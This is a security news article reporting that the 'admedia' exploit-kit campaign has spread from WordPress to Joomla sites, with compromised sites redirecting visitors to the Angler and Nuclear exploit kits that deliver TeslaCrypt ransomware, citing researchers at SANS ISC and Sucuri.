Exploit kits infecting thousands of WordPress websites are setting their sights on the open-source content management system Joomla in a new campaign spotted by a researcher at the SANS Institute’s Internet Storm Center.
“The group behind the WordPress ‘admedia’ campaign is now apparently targeting Joomla sites,” said Brad Duncan, security researcher at Rackspace. “We are starting to see the same traffic characteristics in infections that are associated with Joomla sites – as we did with the WordPress campaign,” Duncan said.
Researchers at Heimdal Security reported visitors to those compromised WordPress sites are redirected to malicious websites that contained the Nuclear Exploit Kit, a collection of exploits targeting Adobe products (Flash, Reader, Acrobat), Internet Explorer and Microsoft Silverlight. Since then, Attacks have shifted, whereas now they are delivering the Angler Exploit Kit, according to research by Malwarebytes.
“Exploit kit traffic associated with this campaign has generally sent TeslaCrypt ransomware,” wrote Duncan, who posted his finding on Thursday to ISC site. Teslacrypt, like other versions of crypto-ransomware, encrypts files stored on the local hard drive and demands a ransom in exchange the encryption key.
On Friday, Sucuri confirmed to Threatpost it’s also seeing the malware affecting Joomla sites. “Although the number of infected Joomla sites is smaller by an order of magnitude (so is the market share of Joomla). And in some cases the infected Joomla sites shared the same hosting accounts with WordPress sites,” said Denis Sinegubko, a researcher at Sucuri who first identified the WordPress compromise, in an email.
Linking WordPress Attacks To Joomla
Duncan said the same group is behind both the Angler and Nuclear attacks. In his research, Duncan examined the long string of hexadecimal code that was part of the exploit’s injected script in the .js files. “Translate that string from hex to ASCII, and you’ll find a URL for the admedia gate,” he wrote.
Duncan explains: “Admedia was a common string used in malicious URLs associated with the rogue WordPress iframes. “Because of that, some people use the term ‘admedia’ when referring to traffic generated by this campaign. These ‘admedia’ URLs act as a gate between the compromised website and the EK server,” Duncan wrote.
On Wednesday, Duncan documented an Angler EK infection related to this “admedia” campaign on a compromised Joomla site. “I got a full chain of events. The chain started with a compromised website that generated an ‘admedia’ gate. The gate led to Angler EK. Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.”
Sucuri’s Sinegubko believes that the attackers scans for multiple vulnerabilities on WordPress, Joomla and Drupal sites and infect those it can. “Since most versions of the malware don’t depend on any particular CMS (they just infect .js files that can be found in any CMS) they use the vulnerability to break into the server, upload a backdoor and the make it find and infect all .js files,” Sinegubko said.
According to Sucuri, the peak of WordPress infections (in terms of sites cleaned) was about nine days ago.